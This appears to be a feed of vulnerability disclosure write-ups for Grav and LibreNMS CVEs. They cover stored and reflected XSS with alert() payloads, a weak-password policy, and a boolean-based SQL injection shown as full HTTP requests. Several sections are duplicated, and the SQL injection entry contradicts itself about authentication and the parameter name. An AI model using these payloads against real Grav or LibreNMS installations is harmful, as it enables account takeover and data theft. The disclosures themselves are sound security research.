<code>data[header][template]</code> field, which is stored in the YAML frontmatter of the page. An attacker can inject JavaScript code using this field, and the payload is rendered and executed when the page is accessed, especially within the Admin Panel interface.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"><script>alert('PoC-XXS73')</script> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Log in to the Grav Admin Panel and navigate to <b>Pages</b>.</li> <li>Create a new page or edit an existing one.</li> <li>In the <b>Advanced > Template</b> field (which maps to <code>data[header][template]</code>), insert the payload:</li> </ul> </p> <p><img src="/p/cve-2025-66310/image.png" width="1910" height="695" srcset="/p/cve-2025-66310/image_hu_8bfe0d4dea5df50c.png 480w, /p/cve-2025-66310/image_hu_98b89a8f489219fc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="274" data-flex-basis="659px" /></p> <p style="text-align: justify;"> <ul> <li>Save the page.</li> <li>Return to the <b>Pages</b> section and click on the <b>three-dot menu</b> of the affected page:</li> </ul> </p> <p><img src="/p/cve-2025-66310/image-1.png" width="819" height="625" srcset="/p/cve-2025-66310/image-1_hu_910ecbc70fceca54.png 480w, /p/cve-2025-66310/image-1_hu_642c42209238d437.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="314px" /></p> <p style="text-align: justify;"> <ul> <li>The stored XSS payload is triggered, and the script is executed in the browser:</li> </ul> </p> <p><img src="/p/cve-2025-66310/image-2.png" width="753" height="466" srcset="/p/cve-2025-66310/image-2_hu_9b23293ebfc30995.png 480w, /p/cve-2025-66310/image-2_hu_ad614adf733a9c65.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="161" data-flex-basis="387px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-66311/ https://www.cvehunters.com/p/cve-2025-66311/ <h2 id="cve-2025-66311-cross-site-scripting-xss-stored-endpoint-adminpagespage-in-multiples-parameters">CVE-2025-66311: Cross-Site Scripting (XSS) Stored Endpoint <code>/admin/pages/[page]</code> in Multiples Parameters </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66311" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66311</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/pages/[page]</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[header][metadata]</code>, <code>data[header][taxonomy][category]</code> and <code>data[header][taxonomy][tag]</code> parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.</p><h2 id="cve-2025-66311-cross-site-scripting-xss-stored-endpoint-adminpagespage-in-multiples-parameters">CVE-2025-66311: Cross-Site Scripting (XSS) Stored Endpoint <code>/admin/pages/[page]</code> in Multiples Parameters </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66311" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66311</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/pages/[page]</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[header][metadata]</code>, <code>data[header][taxonomy][category]</code> and <code>data[header][taxonomy][tag]</code> parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /admin/pages/[page]</code></p> <p>Parameters: <code>data[header][metadata]</code>, <code>data[header][taxonomy][category]</code> and <code>data[header][taxonomy][tag]</code></p> <p style="text-align: justify;">The application fails to properly sanitize user input when saving page metadata or taxonomy fields via the Admin Panel. As a result, an attacker with access to the admin interface can inject a malicious script using these parameters, and the script will be stored in the page's YAML frontmatter. When the page or metadata is rendered (especially in the Admin Panel), the payload is executed in the browser of any user with access.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Log into the Grav Admin Panel and navigate to <b>Pages</b>.</li> <li>Create or edit a page.</li> <li>Inject the payload above into any of the following fields in the Options tab: <b>Metadata</b> key name; <b>Category</b> under Taxonomy; <b>Tag</b> under Taxonomy:</li> </ul> </p> <p><img src="/p/cve-2025-66311/image.png" width="1889" height="772" srcset="/p/cve-2025-66311/image_hu_129d0e4604e7b1d0.png 480w, /p/cve-2025-66311/image_hu_380b4f06d4f89362.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="244" data-flex-basis="587px" /></p> <p><img src="/p/cve-2025-66311/image-1.png" width="848" height="680" srcset="/p/cve-2025-66311/image-1_hu_cc5fbfca26033db6.png 480w, /p/cve-2025-66311/image-1_hu_84c2ecb12a0e25dd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="124" data-flex-basis="299px" /></p> <p style="text-align: justify;"> <ul> <li>Save the page.</li> </ul> </p> <p><img src="/p/cve-2025-66311/image-2.png" width="1093" height="559" srcset="/p/cve-2025-66311/image-2_hu_9166270826c0da33.png 480w, /p/cve-2025-66311/image-2_hu_25d09907adc2064.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="195" data-flex-basis="469px" /></p> <p style="text-align: justify;">When the page is loaded again in the Admin Panel or potentially on the frontend (depending on how the metadata is used), the script is executed, confirming the Stored XSS vulnerability.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-66312/ https://www.cvehunters.com/p/cve-2025-66312/ <h2 id="cve-2025-66312-cross-site-scripting-xss-stored-endpoint-adminaccountsgroupsgroup-parameter-datareadablename">CVE-2025-66312: Cross-Site Scripting (XSS) Stored endpoint <code>/admin/accounts/groups/[group]</code> parameter <code>data[readableName]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66312" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66312</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/accounts/groups/Grupo</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[readableName]</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /admin/accounts/groups/Grupo</code></p><h2 id="cve-2025-66312-cross-site-scripting-xss-stored-endpoint-adminaccountsgroupsgroup-parameter-datareadablename">CVE-2025-66312: Cross-Site Scripting (XSS) Stored endpoint <code>/admin/accounts/groups/[group]</code> parameter <code>data[readableName]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66312" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66312</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/accounts/groups/Grupo</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[readableName]</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /admin/accounts/groups/Grupo</code></p> <p>Parameter: <code>data[readableName]</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"><ScRipT>alert('PoC-XSS')</ScRipT> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Navigate to <b>Accounts > Groups</b> in the administrative panel.</li> <li>Create a new group or edit an existing one.</li> <li>In the <b>Display Name</b> field (which maps to <code>data[readableName]</code>), insert the payload above and save the changes.</li> </ul> </p> <p><img src="/p/cve-2025-66312/image.png" width="1309" height="549" srcset="/p/cve-2025-66312/image_hu_56c71e0062372f4f.png 480w, /p/cve-2025-66312/image_hu_765f3adc436b0b52.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" /></p> <p style="text-align: justify;"> <ul> <li>The following HTTP request was generated during this action:</li> </ul> </p> <p><img src="/p/cve-2025-66312/image-1.png" width="849" height="669" srcset="/p/cve-2025-66312/image-1_hu_635bb1670341f446.png 480w, /p/cve-2025-66312/image-1_hu_79252ce353d0bcdd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="126" data-flex-basis="304px" /></p> <p style="text-align: justify;"> <ul> <li>Next, go to <b>Accounts > Users</b> and open any user profile.</li> </ul> </p> <p><img src="/p/cve-2025-66312/image-2.png" width="1307" height="560" srcset="/p/cve-2025-66312/image-2_hu_cc964237802c91e6.png 480w, /p/cve-2025-66312/image-2_hu_ea8f2a27d7b43b7f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <p style="text-align: justify;"> <ul> <li>The malicious script is executed immediately in the browser when the page loads, confirming the existence of a Stored XSS vulnerability.</li> </ul> </p> <p><img src="/p/cve-2025-66312/image-3.png" width="945" height="446" srcset="/p/cve-2025-66312/image-3_hu_f451aa2b0f343379.png 480w, /p/cve-2025-66312/image-3_hu_82084485c0851189.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="508px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-65013/ https://www.cvehunters.com/p/cve-2025-65013/ <h2 id="cve-2025-65013-cross-site-scripting-xss-reflected-in-endpoint-mapsnodeimage-parameter-image-name">CVE-2025-65013: Cross-Site Scripting (XSS) Reflected in endpoint <code>/maps/nodeimage</code> parameter <code>Image Name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65013</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>/maps/nodeimage</code> endpoint of the LibreNMS application. This vulnerability allows attackers to inject malicious scripts into the <code>Image Name</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/maps/nodeimage</code></p> <p>Parameter: <code>Image Name</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-65013/image.png" width="713" height="589" srcset="/p/cve-2025-65013/image_hu_d47d134d7563c0b1.png 480w, /p/cve-2025-65013/image_hu_790aaa5d86f85434.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="121" data-flex-basis="290px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-65013-cross-site-scripting-xss-reflected-in-endpoint-mapsnodeimage-parameter-image-name">CVE-2025-65013: Cross-Site Scripting (XSS) Reflected in endpoint <code>/maps/nodeimage</code> parameter <code>Image Name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65013</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>/maps/nodeimage</code> endpoint of the LibreNMS application. This vulnerability allows attackers to inject malicious scripts into the <code>Image Name</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/maps/nodeimage</code></p> <p>Parameter: <code>Image Name</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-65013/image.png" width="713" height="589" srcset="/p/cve-2025-65013/image_hu_d47d134d7563c0b1.png 480w, /p/cve-2025-65013/image_hu_790aaa5d86f85434.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="121" data-flex-basis="290px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x" target="_blank" rel="noopener" >https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 18 Nov 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-65014/ https://www.cvehunters.com/p/cve-2025-65014/ <h2 id="cve-2025-65014-weak-password-policy-vulnerability-in-user-management-functionality">CVE-2025-65014: Weak Password Policy Vulnerability in User Management Functionality </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65014" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65014</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Weak Password Policy vulnerability was identified in the user management functionality of the LibreNMS application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as <code>123456</code>. This exposes the platform to brute-force and credential stuffing attacks.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to enforce a strong password policy when creating new users. As a result, administrators can define trivial and well-known weak passwords, compromising the authentication security of the system.</p><h2 id="cve-2025-65014-weak-password-policy-vulnerability-in-user-management-functionality">CVE-2025-65014: Weak Password Policy Vulnerability in User Management Functionality </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65014" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65014</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Weak Password Policy vulnerability was identified in the user management functionality of the LibreNMS application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as <code>123456</code>. This exposes the platform to brute-force and credential stuffing attacks.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to enforce a strong password policy when creating new users. As a result, administrators can define trivial and well-known weak passwords, compromising the authentication security of the system.</p> <p>Vulnerable Component: <code>User creation / password definition</code></p> <h3 id="poc">PoC </h3><p style="text-align: justify;"> <ul> <li>Log in to the application using an <b>Administrator</b> account.</li> <li>Navigate to the user management section:</li> <li>Create a new user account using the password <code>12345678</code>.</li> <li>The application accepts the weak password without restrictions and creates the account successfully.</li> </ul> </p> <p><img src="/p/cve-2025-65014/image.png" width="1103" height="852" srcset="/p/cve-2025-65014/image_hu_21856582e6cd0438.png 480w, /p/cve-2025-65014/image_hu_bd6251cd2138ff.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="129" data-flex-basis="310px" /></p> <p><img src="/p/cve-2025-65014/image-1.png" width="1359" height="487" srcset="/p/cve-2025-65014/image-1_hu_b22d3f1498de98f3.png 480w, /p/cve-2025-65014/image-1_hu_b4baf5a5f4a79968.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="279" data-flex-basis="669px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Increased risk of brute-force and credential stuffing attacks.</li> <li>Unauthorized access to user or administrative accounts.</li> <li>Privilege escalation through compromised accounts.</li> <li>Reduced overall security posture of the application.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g" target="_blank" rel="noopener" >https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 18 Nov 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-65093/ https://www.cvehunters.com/p/cve-2025-65093/ <h2 id="cve-2025-65093-sql-injection-boolean-based-vulnerability-in-hostname-parameter-on-ajax_outputphp-endpoint">CVE-2025-65093: SQL Injection (Boolean-Based) Vulnerability in <code>hostname</code> Parameter on <code>ajax_output.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65093" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65093</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>hostname</code> parameter of the <code>ajax_output.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>hostname</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-65093-sql-injection-boolean-based-vulnerability-in-hostname-parameter-on-ajax_outputphp-endpoint">CVE-2025-65093: SQL Injection (Boolean-Based) Vulnerability in <code>hostname</code> Parameter on <code>ajax_output.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65093" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65093</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>hostname</code> parameter of the <code>ajax_output.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>hostname</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>ajax_output.php</code></p> <p>Parameter: <code>id</code></p> <p style="text-align: justify;"> <ul> <li><b>Authenticate with an administrator account.</b></br> The discovery endpoint <code>/ajax_output.php</code> is accessible only to users with admin-level privileges.</li> <li>Access the following URL with the payload that evaluates to <code>TRUE:</code></li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=1+AND+'1'='1 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.0.5.5:8000 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://10.0.5.5:8000/device/3/capture </span></span><span class="line"><span class="cl">Cookie: laravel_session=[ADMIN_SESSION_COOKIE] </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Observe that the system returns the expected data and triggers the discovery process.</li> </ul> </p> <p><img src="/p/cve-2025-65093/image.png" width="1507" height="666" srcset="/p/cve-2025-65093/image_hu_be0427b4a619e324.png 480w, /p/cve-2025-65093/image_hu_7986fb62e6a5776b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="226" data-flex-basis="543px" /></p> <p style="text-align: justify;"> <ul> <li>Now repeat the request with a <code>FALSE</code> condition:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=2+AND+'1'='1 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.0.5.5:8000 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://10.0.5.5:8000/device/3/capture </span></span><span class="line"><span class="cl">Cookie: laravel_session=[SESSION COOKIE] </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Observe that the response is altered: no device is found, and no discovery is triggered.</li> </ul> </p> <p><img src="/p/cve-2025-65093/image-1.png" width="1496" height="662" srcset="/p/cve-2025-65093/image-1_hu_fd11cdac0c88dc23.png 480w, /p/cve-2025-65093/image-1_hu_88de69507b3ff869.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="225" data-flex-basis="542px" /></p> <blockquote> <p>The difference in output confirms that the injected Boolean logic is being executed by the database.</p> </blockquote> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9" target="_blank" rel="noopener" >https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9</a></strong></em></p> 